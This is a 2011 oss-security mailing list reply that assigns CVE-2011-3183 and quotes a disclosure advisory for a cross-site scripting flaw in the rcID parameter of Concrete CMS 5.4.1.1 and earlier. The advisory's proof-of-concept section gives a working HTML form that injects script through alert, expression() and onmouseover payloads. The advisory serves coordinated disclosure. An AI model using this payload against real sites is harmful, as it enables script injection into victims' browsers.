Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 22 Aug 2011 16:01:04 -0400 (EDT)
From: Josh Bressers <bressers@...hat.com>
To: oss-security@...ts.openwall.com
Cc: coley <coley@...re.org>
Subject: Re: CVE Request: Concrete CMS 5.4.1.1 <= Cross Site
 Scripting

Please use CVE-2011-3183 for this.

Thanks.

-- 
    JB


----- Original Message -----
> Concrete CMS 5.4.1.1 <= Cross Site Scripting
> 
> 
> 1. OVERVIEW
> 
> Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site
> Scripting.
> 
> 
> 2. BACKGROUND
> 
> Concrete5 makes running a website easy. Go to any page in your site,
> and a editing toolbar gives you all the controls you need to update
> your website. No intimidating manuals, no complicated administration
> interfaces - just point and click.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> The rcID parameter is not properly sanitized, which allows attacker to
> conduct Cross Site Scripting attack. This may allow an attacker to
> create a specially crafted URL that would execute arbitrary script
> code in a victim's browser.
> 
> 
> 4. VERSIONS AFFECTED
> 
> CMS 5.4.1.1 <=
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> 
> vulnerable parameter: rcID
> 
> <form action="http://[target]/Concrete/index.php/login/do_login/"
> method="post">
> <input type="hidden" name="uName" value="test" />
> <input type="hidden" name="uPassword" value="test" />
> <input type="hidden" name="rcID" value='"
> style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/));
> onmouseover="alert(/XSS/)' />
> <input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1
> XSS" />
> </form>
> 
> 
> 6. SOLUTION
> 
> Upgrade to 5.4.2 or higher.
> 
> 
> 7. VENDOR
> 
> Concrete CMS Developers
> http://www.concrete5.org/
> 
> 
> 8. CREDIT
> 
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
> 
> 
> 9. DISCLOSURE TIME-LINE
> 
> 2011-04-14: vulnerability reported
> 2011-08-04: vendor released fixed version
> 2011-08-23: vulnerability disclosed
> 
> 
> 10. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting
> Project Home: http://www.concrete5.org/
> Vendor Release Note:
> http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/
> 
> 
> 
> #yehg [2011-08-23]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.